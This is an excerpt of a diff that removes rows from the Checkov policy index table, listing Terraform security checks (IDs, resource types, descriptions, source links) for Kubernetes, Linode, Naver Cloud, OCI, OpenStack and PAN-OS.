-| 1958 | CKV_K8S_43      | resource | kubernetes_pod_v1                                       | Image should use digest                                                                                                                                                                                  | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py)                                                                                          |
-| 1959 | CKV_K8S_44      | resource | kubernetes_service                                      | Ensure that the Tiller Service (Helm v2) is deleted                                                                                                                                                      | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py)                                                                                      |
-| 1960 | CKV_K8S_44      | resource | kubernetes_service_v1                                   | Ensure that the Tiller Service (Helm v2) is deleted                                                                                                                                                      | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py)                                                                                      |
-| 1961 | CKV_K8S_49      | resource | kubernetes_cluster_role                                 | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py)                                                                                      |
-| 1962 | CKV_K8S_49      | resource | kubernetes_cluster_role_v1                              | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py)                                                                                      |
-| 1963 | CKV_K8S_49      | resource | kubernetes_role                                         | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py)                                                                                      |
-| 1964 | CKV_K8S_49      | resource | kubernetes_role_v1                                      | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py)                                                                                      |
-| 1965 | CKV_LIN_1       | provider | linode                                                  | Ensure no hard coded Linode tokens exist in provider                                                                                                                                                     | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/linode/credentials.py)                                                                                              |
-| 1966 | CKV_LIN_2       | resource | linode_instance                                         | Ensure SSH key set in authorized_keys                                                                                                                                                                    | Terraform | [authorized_keys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/authorized_keys.py)                                                                                      |
-| 1967 | CKV_LIN_3       | resource | linode_user                                             | Ensure email is set                                                                                                                                                                                      | Terraform | [user_email_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_email_set.py)                                                                                        |
-| 1968 | CKV_LIN_4       | resource | linode_user                                             | Ensure username is set                                                                                                                                                                                   | Terraform | [user_username_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_username_set.py)                                                                                  |
-| 1969 | CKV_LIN_5       | resource | linode_firewall                                         | Ensure Inbound Firewall Policy is not set to ACCEPT                                                                                                                                                      | Terraform | [firewall_inbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_inbound_policy.py)                                                                      |
-| 1970 | CKV_LIN_6       | resource | linode_firewall                                         | Ensure Outbound Firewall Policy is not set to ACCEPT                                                                                                                                                     | Terraform | [firewall_outbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_outbound_policy.py)                                                                    |
-| 1971 | CKV_NCP_1       | resource | ncloud_lb_target_group                                  | Ensure HTTP HTTPS Target group defines Healthcheck                                                                                                                                                       | Terraform | [LBTargetGroupDefinesHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupDefinesHealthCheck.py)                                                         |
-| 1972 | CKV_NCP_2       | resource | ncloud_access_control_group                             | Ensure every access control groups rule has a description                                                                                                                                                | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py)                                                     |
-| 1973 | CKV_NCP_2       | resource | ncloud_access_control_group_rule                        | Ensure every access control groups rule has a description                                                                                                                                                | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py)                                                     |
-| 1974 | CKV_NCP_3       | resource | ncloud_access_control_group_rule                        | Ensure no security group rules allow outbound traffic to 0.0.0.0/0                                                                                                                                       | Terraform | [AccessControlGroupOutboundRule.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupOutboundRule.py)                                                           |
-| 1975 | CKV_NCP_4       | resource | ncloud_access_control_group_rule                        | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 22                                                                                                                                  | Terraform | [AccessControlGroupInboundRulePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort22.py)                                                 |
-| 1976 | CKV_NCP_5       | resource | ncloud_access_control_group_rule                        | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 3389                                                                                                                                | Terraform | [AccessControlGroupInboundRulePort3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort3389.py)                                             |
-| 1977 | CKV_NCP_6       | resource | ncloud_server                                           | Ensure Server instance is encrypted.                                                                                                                                                                     | Terraform | [ServerEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerEncryptionVPC.py)                                                                                 |
-| 1978 | CKV_NCP_7       | resource | ncloud_launch_configuration                             | Ensure Basic Block storage is encrypted.                                                                                                                                                                 | Terraform | [LaunchConfigurationEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LaunchConfigurationEncryptionVPC.py)                                                       |
-| 1979 | CKV_NCP_8       | resource | ncloud_network_acl_rule                                 | Ensure no NACL allow inbound from 0.0.0.0:0 to port 20                                                                                                                                                   | Terraform | [NACLInbound20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound20.py)                                                                                             |
-| 1980 | CKV_NCP_9       | resource | ncloud_network_acl_rule                                 | Ensure no NACL allow inbound from 0.0.0.0:0 to port 21                                                                                                                                                   | Terraform | [NACLInbound21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound21.py)                                                                                             |
-| 1981 | CKV_NCP_10      | resource | ncloud_network_acl_rule                                 | Ensure no NACL allow inbound from 0.0.0.0:0 to port 22                                                                                                                                                   | Terraform | [NACLInbound22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound22.py)                                                                                             |
-| 1982 | CKV_NCP_11      | resource | ncloud_network_acl_rule                                 | Ensure no NACL allow inbound from 0.0.0.0:0 to port 3389                                                                                                                                                 | Terraform | [NACLInbound3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound3389.py)                                                                                         |
-| 1983 | CKV_NCP_12      | resource | ncloud_network_acl_rule                                 | An inbound Network ACL rule should not allow ALL ports.                                                                                                                                                  | Terraform | [NACLPortCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLPortCheck.py)                                                                                             |
-| 1984 | CKV_NCP_13      | resource | ncloud_lb_listener                                      | Ensure LB Listener uses only secure protocols                                                                                                                                                            | Terraform | [LBListenerUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsesSecureProtocols.py)                                                             |
-| 1985 | CKV_NCP_14      | resource | ncloud_nas_volume                                       | Ensure NAS is securely encrypted                                                                                                                                                                         | Terraform | [NASEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NASEncryptionEnabled.py)                                                                               |
-| 1986 | CKV_NCP_15      | resource | ncloud_lb_target_group                                  | Ensure Load Balancer Target Group is not using HTTP                                                                                                                                                      | Terraform | [LBTargetGroupUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupUsingHTTPS.py)                                                                         |
-| 1987 | CKV_NCP_16      | resource | ncloud_lb                                               | Ensure Load Balancer isn't exposed to the internet                                                                                                                                                       | Terraform | [LBNetworkPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBNetworkPrivate.py)                                                                                       |
-| 1988 | CKV_NCP_18      | resource | ncloud_auto_scaling_group                               | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks.                                                                                        | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml)                                                                       |
-| 1989 | CKV_NCP_18      | resource | ncloud_lb_target_group                                  | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks.                                                                                        | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml)                                                                       |
-| 1990 | CKV_NCP_19      | resource | ncloud_nks_cluster                                      | Ensure Naver Kubernetes Service public endpoint disabled                                                                                                                                                 | Terraform | [NKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSPublicAccess.py)                                                                                         |
-| 1991 | CKV_NCP_20      | resource | ncloud_route                                            | Ensure Routing Table associated with Web tier subnet have the default route (0.0.0.0/0) defined to allow connectivity                                                                                    | Terraform | [RouteTableNATGatewayDefault.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/RouteTableNATGatewayDefault.py)                                                                 |
-| 1992 | CKV_NCP_22      | resource | ncloud_nks_cluster                                      | Ensure NKS control plane logging enabled for all log types                                                                                                                                               | Terraform | [NKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSControlPlaneLogging.py)                                                                           |
-| 1993 | CKV_NCP_22      | resource | ncloud_route_table                                      | Ensure a route table for the public subnets is created.                                                                                                                                                  | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml)                                               |
-| 1994 | CKV_NCP_22      | resource | ncloud_subnet                                           | Ensure a route table for the public subnets is created.                                                                                                                                                  | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml)                                               |
-| 1995 | CKV_NCP_23      | resource | ncloud_public_ip                                        | Ensure Server instance should not have public IP.                                                                                                                                                        | Terraform | [ServerPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerPublicIP.py)                                                                                           |
-| 1996 | CKV_NCP_24      | resource | ncloud_lb_listener                                      | Ensure Load Balancer Listener Using HTTPS                                                                                                                                                                | Terraform | [LBListenerUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsingHTTPS.py)                                                                               |
-| 1997 | CKV_NCP_25      | resource | ncloud_access_control_group_rule                        | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 80                                                                                                                                  | Terraform | [AccessControlGroupInboundRulePort80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort80.py)                                                 |
-| 1998 | CKV_NCP_26      | resource | ncloud_access_control_group                             | Ensure Access Control Group has Access Control Group Rule attached                                                                                                                                       | Terraform | [AccessControlGroupRuleDefine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AccessControlGroupRuleDefine.yaml)                                                       |
-| 1999 | CKV_OCI_1       | provider | oci                                                     | Ensure no hard coded OCI private key in provider                                                                                                                                                         | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/oci/credentials.py)                                                                                                 |
-| 2000 | CKV_OCI_2       | resource | oci_core_volume                                         | Ensure OCI Block Storage Block Volume has backup enabled                                                                                                                                                 | Terraform | [StorageBlockBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py)                                                                     |
-| 2001 | CKV_OCI_3       | resource | oci_core_volume                                         | OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK)                                                                                                                      | Terraform | [StorageBlockEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py)                                                                           |
-| 2002 | CKV_OCI_4       | resource | oci_core_instance                                       | Ensure OCI Compute Instance boot volume has in-transit data encryption enabled                                                                                                                           | Terraform | [InstanceBootVolumeIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py)                                             |
-| 2003 | CKV_OCI_5       | resource | oci_core_instance                                       | Ensure OCI Compute Instance has Legacy MetaData service endpoint disabled                                                                                                                                | Terraform | [InstanceMetadataServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py)                                                           |
-| 2004 | CKV_OCI_6       | resource | oci_core_instance                                       | Ensure OCI Compute Instance has monitoring enabled                                                                                                                                                       | Terraform | [InstanceMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py)                                                                     |
-| 2005 | CKV_OCI_7       | resource | oci_objectstorage_bucket                                | Ensure OCI Object Storage bucket can emit object events                                                                                                                                                  | Terraform | [ObjectStorageEmitEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py)                                                                         |
-| 2006 | CKV_OCI_8       | resource | oci_objectstorage_bucket                                | Ensure OCI Object Storage has versioning enabled                                                                                                                                                         | Terraform | [ObjectStorageVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py)                                                                         |
-| 2007 | CKV_OCI_9       | resource | oci_objectstorage_bucket                                | Ensure OCI Object Storage is encrypted with Customer Managed Key                                                                                                                                         | Terraform | [ObjectStorageEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py)                                                                         |
-| 2008 | CKV_OCI_10      | resource | oci_objectstorage_bucket                                | Ensure OCI Object Storage is not Public                                                                                                                                                                  | Terraform | [ObjectStoragePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py)                                                                                 |
-| 2009 | CKV_OCI_11      | resource | oci_identity_authentication_policy                      | OCI IAM password policy - must contain lower case                                                                                                                                                        | Terraform | [IAMPasswordPolicyLowerCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py)                                                                   |
-| 2010 | CKV_OCI_12      | resource | oci_identity_authentication_policy                      | OCI IAM password policy - must contain Numeric characters                                                                                                                                                | Terraform | [IAMPasswordPolicyNumeric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py)                                                                       |
-| 2011 | CKV_OCI_13      | resource | oci_identity_authentication_policy                      | OCI IAM password policy - must contain Special characters                                                                                                                                                | Terraform | [IAMPasswordPolicySpecialCharacters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py)                                                   |
-| 2012 | CKV_OCI_14      | resource | oci_identity_authentication_policy                      | OCI IAM password policy - must contain Uppercase characters                                                                                                                                              | Terraform | [IAMPasswordPolicyUpperCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py)                                                                   |
-| 2013 | CKV_OCI_15      | resource | oci_file_storage_file_system                            | Ensure OCI File System is Encrypted with a customer Managed Key                                                                                                                                          | Terraform | [FileSystemEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/FileSystemEncryption.py)                                                                               |
-| 2014 | CKV_OCI_16      | resource | oci_core_security_list                                  | Ensure VCN has an inbound security list                                                                                                                                                                  | Terraform | [SecurityListIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngress.py)                                                                                 |
-| 2015 | CKV_OCI_17      | resource | oci_core_security_list                                  | Ensure VCN inbound security lists are stateless                                                                                                                                                          | Terraform | [SecurityListIngressStateless.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py)                                                               |
-| 2016 | CKV_OCI_18      | resource | oci_identity_authentication_policy                      | OCI IAM password policy for local (non-federated) users has a minimum length of 14 characters                                                                                                            | Terraform | [IAMPasswordLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordLength.py)                                                                                     |
-| 2017 | CKV_OCI_19      | resource | oci_core_security_list                                  | Ensure no security list allow ingress from 0.0.0.0:0 to port 22.                                                                                                                                         | Terraform | [SecurityListUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py)                                                     |
-| 2018 | CKV_OCI_20      | resource | oci_core_security_list                                  | Ensure no security list allow ingress from 0.0.0.0:0 to port 3389.                                                                                                                                       | Terraform | [SecurityListUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py)                                                 |
-| 2019 | CKV_OCI_21      | resource | oci_core_network_security_group_security_rule           | Ensure security group has stateless ingress security rules                                                                                                                                               | Terraform | [SecurityGroupsIngressStatelessSecurityRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityGroupsIngressStatelessSecurityRules.py)                                 |
-| 2020 | CKV_OCI_22      | resource | oci_core_network_security_group_security_rule           | Ensure no security groups rules allow ingress from 0.0.0.0/0 to port 22                                                                                                                                  | Terraform | [AbsSecurityGroupUnrestrictedIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py)                                                 |
-| 2021 | CKV2_OCI_1      | resource | oci_identity_group                                      | Ensure administrator users are not associated with API keys                                                                                                                                              | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml)                               |
-| 2022 | CKV2_OCI_1      | resource | oci_identity_user                                       | Ensure administrator users are not associated with API keys                                                                                                                                              | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml)                               |
-| 2023 | CKV2_OCI_1      | resource | oci_identity_user_group_membership                      | Ensure administrator users are not associated with API keys                                                                                                                                              | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml)                               |
-| 2024 | CKV2_OCI_2      | resource | oci_core_network_security_group_security_rule           | Ensure NSG does not allow all traffic on RDP port (3389)                                                                                                                                                 | Terraform | [OCI_NSGNotAllowRDP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NSGNotAllowRDP.yaml)                                                                           |
-| 2025 | CKV2_OCI_3      | resource | oci_containerengine_cluster                             | Ensure Kubernetes engine cluster is configured with NSG(s)                                                                                                                                               | Terraform | [OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml)               |
-| 2026 | CKV2_OCI_4      | resource | oci_file_storage_export                                 | Ensure File Storage File System access is restricted to root users                                                                                                                                       | Terraform | [OCI_NFSaccessRestrictedToRootUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NFSaccessRestrictedToRootUsers.yaml)                                           |
-| 2027 | CKV2_OCI_5      | resource | oci_containerengine_node_pool                           | Ensure Kubernetes Engine Cluster boot volume is configured with in-transit data encryption                                                                                                               | Terraform | [OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml)         |
-| 2028 | CKV2_OCI_6      | resource | oci_containerengine_cluster                             | Ensure Kubernetes Engine Cluster pod security policy is enforced                                                                                                                                         | Terraform | [OCI_K8EngineClusterPodSecPolicyEnforced.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterPodSecPolicyEnforced.yaml)                                 |
-| 2029 | CKV_OPENSTACK_1 | provider | openstack                                               | Ensure no hard coded OpenStack password, token, or application_credential_secret exists in provider                                                                                                      | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/openstack/credentials.py)                                                                                           |
-| 2030 | CKV_OPENSTACK_2 | resource | openstack_compute_secgroup_v2                           | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp)                                                                                                                            | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py)                                             |
-| 2031 | CKV_OPENSTACK_2 | resource | openstack_networking_secgroup_rule_v2                   | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp)                                                                                                                            | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py)                                             |
-| 2032 | CKV_OPENSTACK_3 | resource | openstack_compute_secgroup_v2                           | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp)                                                                                                                          | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py)                                         |
-| 2033 | CKV_OPENSTACK_3 | resource | openstack_networking_secgroup_rule_v2                   | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp)                                                                                                                          | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py)                                         |
-| 2034 | CKV_OPENSTACK_4 | resource | openstack_compute_instance_v2                           | Ensure that instance does not use basic credentials                                                                                                                                                      | Terraform | [ComputeInstanceAdminPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py)                                                         |
-| 2035 | CKV_OPENSTACK_5 | resource | openstack_fw_rule_v1                                    | Ensure firewall rule set a destination IP                                                                                                                                                                | Terraform | [FirewallRuleSetDestinationIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py)                                                         |
-| 2036 | CKV_PAN_1       | provider | panos                                                   | Ensure no hard coded PAN-OS credentials exist in provider                                                                                                                                                | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/panos/credentials.py)                                                                                               |
-| 2037 | CKV_PAN_2       | resource | panos_management_profile                                | Ensure plain-text management HTTP is not enabled for an Interface Management Profile                                                                                                                     | Terraform | [InterfaceMgmtProfileNoHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoHTTP.py)                                                                 |
-| 2038 | CKV_PAN_3       | resource | panos_management_profile                                | Ensure plain-text management Telnet is not enabled for an Interface Management Profile                                                                                                                   | Terraform | [InterfaceMgmtProfileNoTelnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoTelnet.py)                                                             |
-| 2039 | CKV_PAN_4       | resource | panos_security_policy                                   | Ensure DSRI is not enabled within security policies                                                                                                                                                      | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py)                                                                                             |
-| 2040 | CKV_PAN_4       | resource | panos_security_rule_group                               | Ensure DSRI is not enabled within security policies                                                                                                                                                      | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py)                                                                                             |
-| 2041 | CKV_PAN_5       | resource | panos_security_policy                                   | Ensure security rules do not have 'applications' set to 'any'                                                                                                                                            | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py)                                                                         |
-| 2042 | CKV_PAN_5       | resource | panos_security_rule_group                               | Ensure security rules do not have 'applications' set to 'any'                                                                                                                                            | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py)                                                                         |
-| 2043 | CKV_PAN_6       | resource | panos_security_policy                                   | Ensure security rules do not have 'services' set to 'any'                                                                                                                                                | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py)                                                                                 |
-| 2044 | CKV_PAN_6       | resource | panos_security_rule_group                               | Ensure security rules do not have 'services' set to 'any'                                                                                                                                                | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py)                                                                                 |
-| 2045 | CKV_PAN_7       | resource | panos_security_policy                                   | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any'                                                                                         | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py)                                                                             |
-| 2046 | CKV_PAN_7       | resource | panos_security_rule_group                               | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any'                                                                                         | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py)                                                                             |
-| 2047 | CKV_PAN_8       | resource | panos_security_policy                                   | Ensure description is populated within security policies                                                                                                                                                 | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py)                                                                                   |
-| 2048 | CKV_PAN_8       | resource | panos_security_rule_group                               | Ensure description is populated within security policies                                                                                                                                                 | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py)                                                                                   |
-| 2049 | CKV_PAN_9       | resource | panos_security_policy                                   | Ensure a Log Forwarding Profile is selected for each security policy rule                                                                                                                                | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py)                                                                               |
-| 2050 | CKV_PAN_9       | resource | panos_security_rule_group                               | Ensure a Log Forwarding Profile is selected for each security policy rule                                                                                                                                | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py)                                                                               |
-| 2051 | CKV_PAN_10      | resource | panos_security_policy                                   | Ensure logging at session end is enabled within security policies                                                                                                                                        | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py)                                                                             |
-| 2052 | CKV_PAN_10      | resource | panos_security_rule_group                               | Ensure logging at session end is enabled within security policies                                                                                                                                        | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py)                                                                             |
-| 2053 | CKV_PAN_11      | resource | panos_ipsec_crypto_profile                              | Ensure IPsec profiles do not specify use of insecure encryption algorithms                                                                                                                               | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py)                                                                         |
-| 2054 | CKV_PAN_11      | resource | panos_panorama_ipsec_crypto_profile                     | Ensure IPsec profiles do not specify use of insecure encryption algorithms                                                                                                                               | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py)                                                                         |
